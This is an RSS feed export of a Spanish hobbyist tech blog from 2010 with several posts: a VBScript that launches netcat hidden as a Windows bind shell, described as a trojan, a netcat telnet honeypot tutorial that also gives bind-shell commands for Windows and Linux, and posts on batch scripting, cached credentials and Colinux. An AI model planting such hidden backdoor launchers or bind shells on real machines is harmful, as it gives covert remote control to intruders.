<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>El Camello, el León y el niño. O la evolución del perro al lobo &#187; Networking</title>
	<atom:link href="http://www.javcasta.com/category/networking/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.javcasta.com</link>
	<description>Blog de Javier Castañón - JavCasta</description>
	<lastBuildDate>Mon, 06 Sep 2010 16:21:53 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Scripting &#8211; vbs: Lanzar proceso oculto con vbs &#8211; Troyano windows con netcat</title>
		<link>http://www.javcasta.com/2010/09/05/scripting-vbs-lanzar-proceso-oculto-con-vbs-troyano-windows-con-netcat/</link>
		<comments>http://www.javcasta.com/2010/09/05/scripting-vbs-lanzar-proceso-oculto-con-vbs-troyano-windows-con-netcat/#comments</comments>
		<pubDate>Sun, 05 Sep 2010 18:37:35 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=6171</guid>
		<description><![CDATA[Lanzar proceso oculto con vbs &#8211; Troyano windows con netcat Si definimos troyano como aquel Sw oculto, al usuario, que sirve para controlar en remoto un sistema, en windows nos bastaría con netcat lanzado de forma oculta como servidor escuchando en un puerto y redireccionando a cmd.exe Si el netcat no aparece en la pestaña [...]]]></description>
			<content:encoded><![CDATA[<h2>Lanzar proceso oculto con vbs &#8211; Troyano windows con netcat</h2>
<p>Si definimos troyano como aquel Sw oculto, al usuario, que sirve para controlar en remoto un sistema, en windows nos bastaría con netcat lanzado de forma oculta como servidor escuchando en un puerto y redireccionando a cmd.exe</p>
<p>Si el netcat no aparece en la pestaña de aplicaciones del task manager o administrador de tareas, ni se ve ninguna ventana o indicador en el escritorio del usuario, nos daríamos por contentos.</p>
<p>Con un poco de vbs se puede hacer:</p>
<p>oculto.vbs</p>
<pre class="brush: vb;">
Const HIDDEN_WINDOW = 12
strComputer = &quot;.&quot;
Set objWMIService = GetObject(&quot;winmgmts:&quot; _
&amp; &quot;{impersonationLevel=impersonate}!\\&quot; &amp; strComputer &amp; &quot;\root\cimv2&quot;)
Set objStartup = objWMIService.Get(&quot;Win32_ProcessStartup&quot;)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(&quot;winmgmts:root\cimv2:Win32_Process&quot;)
errReturn = objProcess.Create _
(&quot;E:\nc111nt\nc -l -p 1357 -e cmd.exe&quot;, null, objConfig, intProcessID)
</pre>
<p>Solo tiene un inconveniente: Si se vería el proceso nc en la pestaña procesos (no en la de aplicaciones)  del task manager o administrador de tareas &#8230; no hay nada perfecto</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/09/TaskManager.jpg"><img class="size-full wp-image-6172  aligncenter" title="TaskManager" src="http://www.javcasta.com/blog/wp-content/uploads/2010/09/TaskManager.jpg" alt="" width="404" height="449" /></a></p>
<p> <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/09/05/scripting-vbs-lanzar-proceso-oculto-con-vbs-troyano-windows-con-netcat/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Batch Scripting &#8211; bat, cmd: Control de conectividad a host y sonido beep</title>
		<link>http://www.javcasta.com/2010/08/30/batch-scripting-bat-cmd-control-de-conectividad-a-host-y-sonido-beep/</link>
		<comments>http://www.javcasta.com/2010/08/30/batch-scripting-bat-cmd-control-de-conectividad-a-host-y-sonido-beep/#comments</comments>
		<pubDate>Mon, 30 Aug 2010 12:04:57 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=6106</guid>
		<description><![CDATA[Sonido beep desde un fichero bat o cmd: Creo el fichero desde consola dos (inicio > ejecutar > cmd) beep.txt c:&#62; copy con beep.txt ^G ^Z Para comprobar si esta bien realizado escribe en consola: type beep.txt , deberias oir un beep (sonido) Ahora vamos al script ( .bat o .cmd) Control de conectividad con [...]]]></description>
			<content:encoded><![CDATA[<p><span style="text-decoration: underline;"><strong>Sonido beep desde un fichero bat o cmd:</strong></span></p>
<p>Creo el fichero desde consola dos (inicio > ejecutar > cmd) <em><strong>beep.txt</strong></em></p>
<p><span style="color: #888888;">c:&gt;</span> <strong>copy con beep.txt</strong></p>
<p><strong>^G</strong></p>
<p><strong>^Z</strong></p>
<p>Para comprobar si esta bien realizado escribe en consola: type beep.txt , deberias oir un beep (sonido)</p>
<p>Ahora vamos al script ( .bat o .cmd)</p>
<p><span style="text-decoration: underline;"><strong>Control de conectividad con script conectividad.bat</strong></span></p>
<p>Comprobamos conectividad con Host www.google.com con delay entre comprobaciones de 5 sg</p>
<p><span style="text-decoration: underline;"><strong><br /></strong></span></p>
<pre class="brush: bash;">
@echo off
:inicio
if exist testigo.txt del testigo.txt
set ERRORLEVEL =
ping -n 1 www.google.com &gt; testigo.txt
rem La solicitud de ping no pudo encontrar el host
echo Comprobando conmectividad ...
@find /C &quot;La solicitud de ping no pudo encontrar el host&quot; testigo.txt &gt; null
rem find /C &quot;recibidos = 0&quot; testigo.txt
rem si errorlevel = 0  ha encontrado recibidos=0 lo cual indica que no hay conectivida
if %ERRORLEVEL%==0  goto pita else goto continua
:continua
color 17
echo Si hay conectividad

rem delay de 5sg
@ping -n 5 127.0.0.1 &gt; null
goto inicio

:pita
echo No hay conectividad
rem start pita.mp3
color cf
type beep.txt
goto inicio
</pre>
<p><span style="text-decoration: underline;"><strong>Demo: Bajo windows XP SP3 en español<br /></strong></span></p>
<p>Ejecuto el script conectividad.bat y si hay conectividad, pantalla en azul y letras blancas y si no la hay pantalla en rojo y letras blancas  y sonido (type beep.txt). la conectividad se simula simplemente desconectado o conectando el cable de red o desactivando o no la wifi o el interfaz de red con salida a Inet&#8230;</p>
<p style="text-align: center;"><strong>Con conectividad</strong></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/conectividad-1.jpg"><img class="size-full wp-image-6107  aligncenter" title="conectividad-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/conectividad-1.jpg" alt="" width="309" height="332" /></a></p>
<p style="text-align: center;">Desconecto cable de red -&gt;<strong> Sin conectividad</strong></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/conectividad-2.jpg"><img class="size-full wp-image-6108  aligncenter" title="conectividad-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/conectividad-2.jpg" alt="" width="324" height="332" /></a></p>
<p style="text-align: center;">Vuelvo a conectar cable de red-&gt; <strong> Con conectividad</strong></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/conectividad-3.jpg"><img class="size-full wp-image-6109  aligncenter" title="conectividad-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/conectividad-3.jpg" alt="" width="302" height="332" /></a></p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/30/batch-scripting-bat-cmd-control-de-conectividad-a-host-y-sonido-beep/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Windows: Validación automática en recursos remotos. Credential Manager 2</title>
		<link>http://www.javcasta.com/2010/08/28/windows-validacion-automatica-en-recursos-remotos-credential-manager-2/</link>
		<comments>http://www.javcasta.com/2010/08/28/windows-validacion-automatica-en-recursos-remotos-credential-manager-2/#comments</comments>
		<pubDate>Sat, 28 Aug 2010 11:24:19 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=6075</guid>
		<description><![CDATA[Validación automática en recursos remotos En windows, desde el panel de control, podemos acceder a &#8220;Cuentas de usuario&#8221; o &#8220;Credential manager&#8220;, que por linea de comandos  se accedería con: inicio &#62; ejecutar &#62; control userpasswords2 . o desde consola con c:\&#62; control userpasswords Pero existe una gui o interfaz visual de usuario más, que nos [...]]]></description>
			<content:encoded><![CDATA[<h1><span style="text-decoration: underline;">Validación automática en recursos remotos</span></h1>
<p>En windows, desde el panel de control, podemos acceder a &#8220;<strong>Cuentas de usuario</strong>&#8221; o &#8220;<strong>Credential manager</strong>&#8220;, que por linea de comandos  se accedería con: <strong>inicio &gt; ejecutar &gt; control userpasswords2</strong> . o desde consola con</p>
<h2 style="text-align: center;"><span style="color: #888888;">c:\&gt;</span> control userpasswords</h2>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-0.jpg"><img class="size-full wp-image-6076  aligncenter" title="validacion-autonatica-recursos-remotos-0" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-0.jpg" alt="" width="608" height="510" /></a></p>
<p style="text-align: left;">Pero existe una gui o interfaz visual de usuario más, que nos puede servir para, entre otros objetivos para:</p>
<h3 style="text-align: left;"><span style="text-decoration: underline;"><strong>Almacenar Nombres de usuario y contraseñas para acceder a recursos remotos</strong>. </span></h3>
<p style="text-align: left;">Esta esta utilidad nos sirve sobre todo para acceder a servidores de otro dominio distinto al nuestro sin tener que estar escribiendo un usuario:contraseña del otro dominio constantemente. Esta algo escondida a la vista, y se accede con</p>
<h2 style="text-align: center;">control userpasswords2</h2>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-1.jpg"><img class="size-full wp-image-6077  aligncenter" title="validacion-autonatica-recursos-remotos-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-1.jpg" alt="" width="347" height="179" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-2.jpg"><img class="size-full wp-image-6078  aligncenter" title="validacion-autonatica-recursos-remotos-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-2.jpg" alt="" width="404" height="448" /></a></p>
<p>Vamos a:  Opciones avanzadas &gt; Administrar contraseñas &gt; Agregar</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-3.jpg"><img class="size-full wp-image-6079  aligncenter" title="validacion-autonatica-recursos-remotos-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-3.jpg" alt="" width="404" height="448" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-4.jpg"><img class="size-full wp-image-6080  aligncenter" title="validacion-autonatica-recursos-remotos-4" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-4.jpg" alt="" width="393" height="320" /></a></p>
<p style="text-align: left;">Y definimos el acceso a un host remoto:</p>
<p style="text-align: left;"><span style="color: #888888;"><em>Servidor: Nombre del host o ip</em></span></p>
<p style="text-align: left;"><span style="color: #888888;"><em>usuario: Usuario@dominio</em></span></p>
<p style="text-align: left;">(aqui uso el formato de NT y W2k, se podria usar el formarto más actual: Dominio\usuario)</p>
<p style="text-align: left;"><span style="color: #888888;"><em>contraseña: ***********</em></span></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-5.jpg"><img class="size-full wp-image-6081  aligncenter" title="validacion-autonatica-recursos-remotos-5" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-5.jpg" alt="" width="344" height="379" /></a></p>
<p style="text-align: left;">Si intento acceder al recurso compartido \\80.59.69.240\c , no hay problemas (l<span style="text-decoration: line-through;">a primera vez, creo que si te pide la password, luego ya no</span>)</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-6.jpg"><img class="size-full wp-image-6082  aligncenter" title="validacion-autonatica-recursos-remotos-6" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-6.jpg" alt="" width="347" height="178" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-7.jpg"><img class="size-full wp-image-6083  aligncenter" title="validacion-autonatica-recursos-remotos-7" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-7.jpg" alt="" width="630" height="378" /></a></p>
<p style="text-align: center;">Pero si intento acceder por el nombre del host a otro recurso compartido ( <em><strong>\\placetorun0\Admin$ </strong></em>), me pide usuario:contraseña, ya que definí el acceso a la ip, no al nombre del host</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-8.jpg"><img class="size-full wp-image-6084  aligncenter" title="validacion-autonatica-recursos-remotos-8" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-8.jpg" alt="" width="346" height="446" /></a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-9.jpg"><img class="size-full wp-image-6085  aligncenter" title="validacion-autonatica-recursos-remotos-9" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-9.jpg" alt="" width="576" height="496" /></a></p>
<p style="text-align: left;">Ahora voy a trabajar por consola (inicio &gt; ejecutar &gt; cmd ) para ver y acceder o mapear recursos compartidos en un host donde ya almacené las credenciales, para que no me este preguntando constantemente por validaciones del usuario.</p>
<p style="text-align: left;">Ver recursos compartidos</p>
<p style="text-align: center;"><span style="color: #888888;">c:\&gt;</span><strong> net view \\80.59.69.241</strong></p>
<p style="text-align: left;">Mapear UD de red a recurso compartido, en este caso el recurso administrativo oculto <em><strong> admin$</strong></em></p>
<p style="text-align: center;"><span style="color: #888888;">c:\&gt;</span> <strong>net use z: \\80.59.69.241\admin$</strong></p>
<p style="text-align: left;">Y creo un fichero de texto en esa UD, (por hacer algo), sin necesidad de editor (lo vamos a crear, el fichero, volcando la entrada de consola)</p>
<p style="text-align: center;"><span style="color: #888888;">c:\&gt;</span> <strong>copy con z:\prueba.txt</strong></p>
<p style="text-align: left;">loquesea &#8230;</p>
<p style="text-align: center;"><strong>^Z</strong></p>
<p style="text-align: left;">(con ctrl-Z se marca el EOF del fichero)</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-10.jpg"><img class="size-full wp-image-6086    aligncenter" title="validacion-autonatica-recursos-remotos-10" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-10.jpg" alt="" width="520" height="628" /></a></p>
<p style="text-align: left;">Y voila, no me ha pedido credenciales, ya que están almacenadas (<em>en caché</em> o <em>cacheadas</em>, se podría decir, creando un <em>palabro</em> nuevo).</p>
<p style="text-align: left;">Solo tiene un handicap, desde el punto de vista de la seguridad, si cacheas usuarios:contraseñas de acceso a un servidor, si alguien tiene acceso local a tu máquina, puede desencriptar las contraseñas. Por ejemplo con Cain&amp;Abel</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-11.jpg"><img class="size-full wp-image-6087  aligncenter" title="validacion-autonatica-recursos-remotos-11" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/validacion-autonatica-recursos-remotos-11.jpg" alt="" width="597" height="276" /></a></p>
<p style="text-align: left;">No hay nada perfecto <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/28/windows-validacion-automatica-en-recursos-remotos-credential-manager-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google RealTime</title>
		<link>http://www.javcasta.com/2010/08/28/google-realtime/</link>
		<comments>http://www.javcasta.com/2010/08/28/google-realtime/#comments</comments>
		<pubDate>Sat, 28 Aug 2010 10:07:08 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Blogs]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=6071</guid>
		<description><![CDATA[Vía: Barrapunto &#8211; Google lanza búsquedas para conversaciones en tiempo real El País cuenta que Google lanza un nuevo sitio específico para búsquedas en tiempo real: «Google ha lanzado una versión de su navegador, real time, que permite seguir al internauta en tiempo real lo que en las redes sociales se está diciendo sobre el [...]]]></description>
			<content:encoded><![CDATA[<p>Vía: <a href="http://barrapunto.com/article.pl?sid=10/08/27/1132214" target="_blank">Barrapunto &#8211; Google lanza búsquedas para conversaciones en tiempo real</a></p>
<blockquote><p>El País cuenta que <a href="http://www.elpais.com/articulo/tecnologia/Google/mejora/busquedas/tiempo/real/elpeputec/20100827elpeputec_1/Tes">Google lanza un nuevo sitio específico para búsquedas en tiempo real</a>: <em>«Google ha lanzado una versión de su navegador, <a href="http://www.google.com/realtime/">real time</a>,  que permite seguir al internauta en tiempo real lo que en las redes  sociales se está diciendo sobre el término buscado. También se puede  acceder desde Google, pulsando a la izquierda Tiempo Real (si no es  visible hay que activar la pestaña Más). El servicio ofrece el flujo de  conversaciones en varias redes sociales (Facebook, Twitter&#8230;) que se  pueden filtrar por fecha, lugar u hora, activando un gráfico que aparece  en la parte superior de la página».</em></p>
</blockquote>
<p>Referencia: <a href="http://www.google.es/realtime" target="_blank">http://www.google.es/realtime</a></p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/GoogleRealTime.jpg"><img class="size-full wp-image-6072  aligncenter" title="GoogleRealTime" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/GoogleRealTime.jpg" alt="" width="654" height="611" /></a></p>
<hr />
<p style="text-align: left;">Mi comentario:</p>
<p style="text-align: left;">Curiosa herramienta. Práctica  para seguir a usuarios en las redes sociales (de Twitter se nutre bastante, de facebook no veo resultados, ergo google se lleva bien con twitter y no tan bien con facebook o puede que la política de privacidad de facebook no sea tan abierta como dicen &#8230; <img src='http://www.javcasta.com/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />   )</p>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/28/google-realtime/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HoneyPot con NetCat en Windows</title>
		<link>http://www.javcasta.com/2010/08/27/honeypot-con-netcat-en-windows/</link>
		<comments>http://www.javcasta.com/2010/08/27/honeypot-con-netcat-en-windows/#comments</comments>
		<pubDate>Fri, 27 Aug 2010 09:22:19 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[seguridad]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=6063</guid>
		<description><![CDATA[HoneyPot con NetCat en Windows NetCat es una utilidad versátil para trabajar con puertos (sockets). La llaman la navaja Suiza de Tcp/IP. Sirve, desde copiar o clonar un disco duro en red (esto al menos en Linux), crear un chat, Obtener una shell remota, hacking, &#8230;,  hasta para crear un HoneyPot Como ejemplo, voy a [...]]]></description>
			<content:encoded><![CDATA[<h1><span style="text-decoration: underline;">HoneyPot con NetCat en Windows</span></h1>
<p style="text-align: center;"><span style="text-decoration: underline;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/netcat.jpg"><img class="size-full wp-image-6070  aligncenter" title="netcat" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/netcat.jpg" alt="" width="158" height="102" /></a><br /> </span></p>
<p><strong>NetCat</strong> es una utilidad versátil para trabajar con puertos (sockets). La llaman <a href="http://crysol.org/node/28" target="_blank">la navaja Suiza de Tcp/IP</a>.</p>
<p>Sirve, desde <a href="http://www.javcasta.com/2010/02/17/linux-copiar-disco-en-red-con-netcat-y-backdoor/" target="_blank">copiar o clonar un disco duro en red</a> (esto al menos en Linux), crear un chat, Obtener una shell remota, hacking, &#8230;,  hasta para crear un HoneyPot</p>
<p>Como ejemplo, voy a crear un <strong>HoneyPot de un servidor de telnet.</strong></p>
<p>Descargo NetCat para windows XP:</p>
<p>* <strong><span style="text-decoration: underline;">descargar</span></strong> <a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/nc111nt.zip">nc111nt.zip</a> (Algunos antivirus puede que clasifiquen esta utilidad como una HackTool o herramienta de hacking, y es realmente eso, una herramienta, no un virus).</p>
<p>* <span style="text-decoration: underline;"><strong>Descomprimo</strong></span> la utilidad. Y <span style="text-decoration: underline;"><strong>creo un fichero de texto</strong></span> llamado telnet.txt tal que:</p>
<p><span style="color: #888888;"><em>Connected to blackberet.gc.intranet.local<br /> Escape character is &#8216;^]&#8217;.<br /> login: root<br /> password: </em></span></p>
<p>* Y desde una consola o shell (inicio &gt; ejecutar &gt; cmd ) <span style="text-decoration: underline;"><strong>creo un servidor de telnet</strong></span></p>
<h2 style="text-align: center;"><span style="color: #888888;">c:\nc111nt&gt;</span> <strong>nc -l -p 23 &lt; telnet.txt</strong></h2>
<ul>
<li><strong>-l </strong>&lt;&#8211;&gt; Opción que indica a netcat que se ponga en modo servidor o a la escucha :<strong>listening</strong></li>
</ul>
<ul>
<li><strong>-p 23</strong> &lt;&#8211;&gt; Opción que indica a netcat el puerto o socket local por el cual va a escuchar, en este caso el por defecto de un servidor telnet (tcp23)</li>
</ul>
<ul>
<li><strong>&lt; telnet.txt</strong> &lt;&#8211;&gt; Direcciono o Canalizo el contenido de ese fichero de texto al &#8220;servidor de telnet&#8221;, es decir, cualquier cliente que se conecte por telnet a mi máquina recibirá el contenido de ese fichero en su consola o cliente de telnet</li>
</ul>
<p>* <span style="text-decoration: underline;"><strong>Prueba de concepto</strong></span> o demo (redirecciono todo el comando al fichero <strong>telnet-log.txt</strong> para tener un registro de que es lo que manda el cliente que se conecte al honeypot de servidor de telnet)</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-1.jpg"><img class="size-full wp-image-6065  aligncenter" title="honeypot-nc-1" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-1.jpg" alt="" width="479" height="296" /></a></p>
<h2 style="text-align: center;"><span style="color: #888888;">c:\nc111nt&gt;</span> <strong>nc -l -p 23 &lt; telnet.txt &gt;&gt; telnet-log.txt</strong></h2>
<p>Y me conecto por telnet, emulando a un cliente:</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-2.jpg"><img class="size-full wp-image-6066  aligncenter" title="honeypot-nc-2" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-2.jpg" alt="" width="238" height="104" /></a></p>
<h2 style="text-align: center;"><span style="color: #888888;">c:\&gt;</span> <strong>telnet 80.59.69.239</strong></h2>
<p>Me aparecerá en la consola el contenido del fichero telnet.txt,</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-4.jpg"><img class="size-full wp-image-6068  aligncenter" title="honeypot-nc-4" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-4.jpg" alt="" width="409" height="142" /></a></p>
<p>y si intento mandar alguna password, quedará registrada en el fichero telnet-log.txt. Y voilá.</p>
<p style="text-align: center;"><a href="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-3.jpg"><img class="size-full wp-image-6067  aligncenter" title="honeypot-nc-3" src="http://www.javcasta.com/blog/wp-content/uploads/2010/08/honeypot-nc-3.jpg" alt="" width="336" height="146" /></a></p>
<hr />
<h2><strong>Nota: <span style="text-decoration: underline;">Servidor Telnet con Netcat</span></strong></h2>
<p>A todo esto, si deseas dotar de un servidor de telnet, <strong>real o verdadero</strong> (no un fake o trampa o honeypot) a tu máquina con netcat, nada más facil:</p>
<p>* <span style="text-decoration: underline;"><strong>Lado del servidor</strong></span>: Ponemos netcat a la escucha en el puerto 23 y se ejecutará en el cliente remoto cmd.exe de nuestra máquina, con lo que obtiene una shell</p>
<ul>
<li><span style="color: #888888;"><span style="color: #333333;">Bajo windows:</span> c:\nc111nt&gt;</span> <strong>nc -l -p 23 -e cmd.exe</strong></li>
<li>Bajo Linux:  <span style="color: #808080;">#</span> <strong>nc -lp 23 -c /bin/sh</strong></li>
</ul>
<p>* <span style="text-decoration: underline;"><strong>lado del cliente:</strong></span> Simplemente conectarse por telnet al objetivo</p>
<p><strong>c:\</strong><strong> telnet 80.59.69.239</strong></p>
<p>y obtendremos la consola remota</p>
<hr />
<p>Referencias:</p>
<p> </p>
<ul>
<li><a title="Permanent Link to Linux: Copiar disco en red con NetCat y backdoor o reverse shell" rel="bookmark" href="../../2010/02/17/linux-copiar-disco-en-red-con-netcat-y-backdoor/" target="_blank">Linux: Copiar disco en red con NetCat y backdoor o reverse shell)</a></li>
<li><a title="Permanent Link to Linux: Chat casero con NetCat y otros usos" rel="bookmark" href="http://www.javcasta.com/2010/01/26/linux-chat-casero-con-netcat-y-otros-usos/" target="_blank">Linux: Chat casero con NetCat y otros usos</a></li>
<li><a href="http://www.javcasta.com/?s=netcat" target="_blank">Netcat, la navaja suiza de TCP/IP</a></li>
<li><a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">http://es.wikipedia.org/wiki/Netcat</a></li>
</ul>
<p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save"><img src="http://www.javcasta.com/blog/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://www.javcasta.com/2010/08/27/honeypot-con-netcat-en-windows/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Virtualización &#8211; Networking: Colinux y Ndis Driver</title>
		<link>http://www.javcasta.com/2010/08/18/virtualizacion-networking-colinux-y-ndis-driver/</link>
		<comments>http://www.javcasta.com/2010/08/18/virtualizacion-networking-colinux-y-ndis-driver/#comments</comments>
		<pubDate>Wed, 18 Aug 2010 13:07:31 +0000</pubDate>
		<dc:creator>javcasta</dc:creator>
				<category><![CDATA[Networking]]></category>
		<category><![CDATA[Scripting]]></category>
		<category><![CDATA[Sistemas]]></category>
		<category><![CDATA[Utilidades]]></category>
		<category><![CDATA[virtualización]]></category>

		<guid isPermaLink="false">http://www.javcasta.com/?p=5962</guid>
		<description><![CDATA[¿Como tener un linux en tu windows, sin usar vmware o virualbox o virtualPC o similar?. la respuesta es CooperativeLinux o Colinux. Tras instalarlo, probé la configuración de la tarjeta de red con modo slirp, o pcap-bridge, pero no se veía  la máquina anfitrión con la huésped. Así que probé con el modo ndis-bridge.(este modo [...]]]></description>
			<content:encoded><![CDATA[<p>¿Como tener un linux en tu windows, sin usar vmware o virualbox o virtualPC o similar?. la respuesta es CooperativeLinux o <a href="http://www.colinux.org/" target="_blank">Colinux</a>.</p>
<p style="text-align: center;"><img class="aligncenter" src="http://www.colinux.org/images/smalllogo.png" alt="" width="150" height="170" /></p>
